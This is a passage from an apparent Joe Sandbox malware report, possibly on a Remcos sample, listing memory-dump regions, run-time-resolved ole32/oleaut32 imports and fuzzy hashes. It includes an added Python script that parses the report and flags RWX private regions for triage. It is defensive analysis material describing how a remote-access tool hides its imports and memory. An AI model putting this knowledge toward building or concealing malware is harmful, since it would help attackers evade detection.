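Run against the names above, the group decodes as a read-only header page at 02D30000, an execute-read region at 02D31000, a read-write region at 02D5E000 and four RWX regions from 02DB7000 upward, all MEM_PRIVATE; the same decoder applied to a report's full dump list gives a quick first pass over which regions to pull for a Remcos configuration extractor or a Yara scan.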
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: 1ada1e41da0d71ebc0e22b16d736641f97ae99b7e62cbbcb3e42d57911d2ade2
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: 17113BB720009183DF55BA2DD8B66B7A795EAC513973C4379C3434B758E322EC41D500
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d420c085b4cbd1a0f14619f21da79696596f2760b2d56dfa882e7987f99df3a2
                                                                                                                        • Instruction ID: 9c082de22a7d19bc7b57dc7f11cbc7112b7248904a078793eec1d1a006ba820e
                                                                                                                        • Opcode Fuzzy Hash: d420c085b4cbd1a0f14619f21da79696596f2760b2d56dfa882e7987f99df3a2
                                                                                                                        • Instruction Fuzzy Hash: 35E0B631905208BFCF516F54ED58A883B6EEF40792F064464FA098A632CB35ED82DA98
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D3D29D
                                                                                                                          • Part of subcall function 02D3D268: GetProcAddress.KERNEL32(00000000), ref: 02D3D281
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                        • Opcode ID: 34e46bfb3be8ec89e852492262574ff37e5cd0ed23aa9580b35764c4c07104aa
                                                                                                                        • Instruction ID: 42b8942e926727c9139c1d69babbff36cabc51b257b85e11523b126ffc96773f
                                                                                                                        • Opcode Fuzzy Hash: 34e46bfb3be8ec89e852492262574ff37e5cd0ed23aa9580b35764c4c07104aa
                                                                                                                        • Instruction Fuzzy Hash: 4941BC67E993089B620B6B6DF410427B7DFE785B147A0C61AF804DB784DA70FC518E39
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D46EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D46EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D46EFF
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D46F0F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D46F1F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D46F2F
• GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02D46F3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: b9ae89b7a278fbaf73d1998dcdee68f044700f36a7ec262cb54790a6c35d25bd
• Instruction ID: 714e52685ae1aa690d30f5ebc4fc330e829f46889672f058611c2175266deaec
• Opcode Fuzzy Hash: b9ae89b7a278fbaf73d1998dcdee68f044700f36a7ec262cb54790a6c35d25bd
• Instruction Fuzzy Hash: EDF04CE0A8C3D07FBB01BB71AC81826279DE521644B041E95F94355786FEB5DD188FF4
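The two entries above resolve their imports at run time (GetModuleHandleA on oleaut32.dll and ole32.dll, then GetProcAddress), so none of those export names appear in the PE import table; the report's APIs lines and String ID field are what an analyst has to rebuild them from, and each Source File name records the memory region the function was dumped out of. The following Python script is an added example, not part of the Joe Sandbox report or its tooling: it parses a constructed excerpt written in the report's own line format, reconstructs a module -> export list (falling back to the String ID list when, as in the oleaut32 entry, the sandbox did not capture the GetProcAddress name argument), and flags functions dumped from writable+executable private memory that the sandbox rebuilt as a PE. The dump-name field layout (pid.run.id.base.protect.state.type.reserved) and its decoding into PAGE_* and MEM_* values are the author's assumptions, not documented on this page; the PAGE_* and MEM_* constants themselves are the standard Windows values.

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's own line format (entries copied from above);
# in practice paste the whole "APIs ... Instruction Fuzzy Hash" listing here.
REPORT_EXCERPT = """\
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D3D29D
  • Part of subcall function 02D3D268: GetProcAddress.KERNEL32(00000000), ref: 02D3D281
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarCmp$oleaut32.dll
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D46EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D46EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D46EFF
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• String ID: CoCreateInstanceEx$CoInitializeEx$ole32.dll
APIs
• _free.LIBCMT ref: 02E07636
• ___free_lconv_mon.LIBCMT ref: 02E07641
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• String ID:
"""

# One API call site: "[Part of subcall function X:] Func.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<fn>[\w@?$]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"•\s*Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+),"
                    r"\s*based on PE:\s*(?P<pe>\w+)")
STR_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")
# ASSUMPTION: dump names are pid.run.id.base.protect.state.type.reserved.sdmp (hex fields).
DUMP_RE = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<uid>\d+)\.(?P<base>[0-9A-F]{16})\."
    r"(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$")

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
ENTRY_STARTS = {"APIs", "Strings", "Memory Dump Source"}


def parse_entries(text):
    """Split the listing into per-function entries: apis, source (dump) and String IDs."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        # A new function entry begins once the current one already has its dump source.
        if cur is None or (line in ENTRY_STARTS and cur["source"] is not None):
            cur = {"apis": [], "source": None, "strings": []}
            entries.append(cur)
        if (m := SRC_RE.match(line)):
            cur["source"] = m.groupdict()
        elif (m := STR_RE.match(line)):
            cur["strings"] = [s for s in m["ids"].split("$") if s]
        elif (m := API_RE.match(line)):
            cur["apis"].append(m.groupdict())
    return entries


def decode_dump_name(name):
    """Base address and page protection of a dump region (field layout assumed above)."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect = int(m["protect"], 16) & 0xFF          # drop PAGE_GUARD/NOCACHE modifiers
    return {"base": int(m["base"], 16), "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
            "rwx": protect == 0x40,
            "private": bool(int(m["type"], 16) & MEM_PRIVATE),
            "committed": bool(int(m["state"], 16) & MEM_COMMIT)}


def resolved_imports(entries):
    """Rebuild module -> export names from GetModuleHandle/LoadLibrary + GetProcAddress sites.
    If the name argument was not captured, fall back to the entry's String IDs minus the DLL."""
    imports = defaultdict(set)
    for e in entries:
        module = None
        for api in e["apis"]:
            fn, args = api["fn"], api["args"] or ""
            if fn.startswith(("GetModuleHandle", "LoadLibrary")) and args and not args.startswith("0000"):
                module = args.lower()                 # ignore NULL (own module) handles
            elif fn == "GetProcAddress":
                names = [p for p in args.split(",")[1:] if p]
                names = names or [s for s in e["strings"] if not s.lower().endswith(".dll")]
                imports[module or "<unknown module>"].update(names)
    return {k: sorted(v) for k, v in imports.items()}


def suspicious_regions(entries):
    """Dump regions that are RWX, privately allocated and rebuilt as a PE: not how an
    image-mapped module normally looks, so these are the dumps to pull first."""
    hits = {}
    for e in entries:
        src = e["source"]
        if src:
            info = decode_dump_name(src["name"])
            if info["rwx"] and info["private"] and src["pe"] == "true":
                hits[src["name"]] = info
    return hits


def summarize(text):
    entries = parse_entries(text)
    return resolved_imports(entries), suspicious_regions(entries)


if __name__ == "__main__":
    imports, regions = summarize(REPORT_EXCERPT)
    for mod, names in imports.items():
        print(f"{mod}: {', '.join(names)}")
    for name, info in regions.items():
        print(f"RWX private PE region at 0x{info['base']:08X}: {name}")
```

Run it on the full listing and the oleaut32 Var* functions come out as a resolved-import set for oleaut32.dll even though the report only shows a single GetProcAddress(00000000) inside a subcall; the 02DB7000 region (protection 00000040) is reported as the RWX private region, while the 02D31000 region decodes to PAGE_EXECUTE_READ and is left alone.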
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1963305004-0
                                                                                                                        • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                        • Instruction ID: a33908b6d97e2449b27c535f94e029b7f45143e2be5e0ec2e934b91d004ec9e5
                                                                                                                        • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                        • Instruction Fuzzy Hash: 20D11871D40301AFDB25AFA888C066E7BA5FF01328F95917DED49972D0E7319982CFA4
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                        • Instruction ID: 468e5da9111330e03ed8472a3d2ee65e69d865e56e111b34d5b8a8b15ab1f0ca
                                                                                                                        • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                        • Instruction Fuzzy Hash: 50B1AEB19003499EDB60DF68C880BEEBBF5FF08304F15406AEA99A7391D7759C41CB64
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 02E07636
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 02E07641
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06890
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068A2
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068B4
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068C6
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068D8
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068EA
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068FC
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E0690E
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06920
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06932
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06944
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06956
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06968
                                                                                                                        • _free.LIBCMT ref: 02E07658
                                                                                                                        • _free.LIBCMT ref: 02E0766D
                                                                                                                        • _free.LIBCMT ref: 02E07678
                                                                                                                        • _free.LIBCMT ref: 02E0769A
                                                                                                                        • _free.LIBCMT ref: 02E076AD
                                                                                                                        • _free.LIBCMT ref: 02E076BB
                                                                                                                        • _free.LIBCMT ref: 02E076C6
                                                                                                                        • _free.LIBCMT ref: 02E076FE
                                                                                                                        • _free.LIBCMT ref: 02E07705
                                                                                                                        • _free.LIBCMT ref: 02E07722
                                                                                                                        • _free.LIBCMT ref: 02E0773A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658870901-0
                                                                                                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction ID: 7758bf7bab9ea562c49acc079407619f6239e2bb982da43b77d75687d7c40e92
                                                                                                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction Fuzzy Hash: 3D316F315403019FDB71AA78E888B56B3EAEF00394F259419E95AD76E0DF31B882CB64
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction ID: 5e3b8866b92049c1dd34b0f7809a316d88d6d2e9320d59e1a360aed6a4c5f9d3
                                                                                                                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction Fuzzy Hash: 3AC14376E80204ABEB20DBA8CC85FDA77FDEB08704F154165FA04FB2C6D6719D918B64
                                                                                                                        APIs
                                                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D328CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                        • API String ID: 2030045667-32948583
                                                                                                                        • Opcode ID: 3a20219daa9fb541bce53dc6868035ca93375c4aa0375f199476b8c35581ef22
                                                                                                                        • Instruction ID: f96aea44011199ce606babe6fc64e116e45a62ef995ae737e2b18ae7952f735c
                                                                                                                        • Opcode Fuzzy Hash: 3a20219daa9fb541bce53dc6868035ca93375c4aa0375f199476b8c35581ef22
                                                                                                                        • Instruction Fuzzy Hash: 05A1E531E042948BDB22AA2CCC88BD9B7E5EB09750F1440E5DD499B385CB758E89CF61
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction ID: cfa9c3b534cc8a4d7301dacd6416c2d59e72fded73de4119a61f407d15e32c04
                                                                                                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction Fuzzy Hash: 95115979510208BFCB45EF54D941CDA3BA6EF04350F5281A5FE188F631DA32DE509F95
                                                                                                                        Strings
                                                                                                                        • Unexpected Memory Leak, xrefs: 02D328C0
                                                                                                                        • The unexpected small block leaks are:, xrefs: 02D32707
                                                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D32849
                                                                                                                        • 7, xrefs: 02D326A1
                                                                                                                        • An unexpected memory leak has occurred. , xrefs: 02D32690
                                                                                                                        • bytes: , xrefs: 02D3275D
                                                                                                                        • , xrefs: 02D32814
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                        • API String ID: 0-2723507874
